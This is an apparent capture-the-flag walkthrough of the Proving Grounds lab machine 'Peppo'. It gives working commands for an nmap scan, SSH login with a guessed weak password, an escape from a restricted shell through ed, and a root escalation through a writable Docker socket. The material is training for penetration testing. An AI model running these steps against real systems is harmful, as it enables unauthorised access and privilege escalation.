Peppo
Exploitation Guide for Peppo | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for Peppo | Proving Grounds
Last updated
Was this helpful?
We will get the initial shell with the help of exposed username and weak credential. Then perform Docker escape to get the root shell.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/peppo/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
53/tcp closed domain
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
| Fpostmaster.c
| L2071
|_ RProcessStartupPacket
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
|_http-title: Redmine
10000/tcp open snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSes
sionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 27 Aug 2021 04:57:47 GMT
| Connection: close
| Hello World
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Fri, 27 Aug 2021 04:57:36 GMT
| Connection: close
|_ Hello World As you can see.
Identservice exposed the possible usernameeleanor
HTTP service is just a rabbit hole. We can login with credential admin:admin but that wont take us anywhere.
Just login to ssh with credential eleanor:eleanor.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/peppo/scans]
└─$ ssh eleanor@192.168.136.60
eleanor@192.168.136.60's password:
Linux peppo 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 27 04:42:09 2021 from 192.168.49.136
We will need to escape the current shell its a restricted rbash. Use ed and input !'/bin/bash' to get out of restricted shell. Then add /usr/bin to PATH variable to use common linux utility.
eleanor@peppo:~$ ed
!'/bin/bash'
eleanor@peppo:~$ export PATH=$PATH:/usr/bin
eleanor@peppo:~$ head local.txt
8321a<REDACTED>99dcef9
Run linpeas to find Privilege vector. You can see that we have permission to write on docker socket.
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)
Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)Just run the following command and we will be root.
eleanor@peppo:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it redmine chroot /host /bin/bash
root@41a1201fe6a9:/# ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
root@41a1201fe6a9:/# whoami
root
root@41a1201fe6a9:/# id
uid=0(root) gid=0(root) groups=0(root)
root@41a1201fe6a9:/# pwd
/
root@41a1201fe6a9:/# cd root
root@41a1201fe6a9:/root# ls
proof.txt
root@41a1201fe6a9:/root# cat proof.txt
57fc<REDACTED>9c80
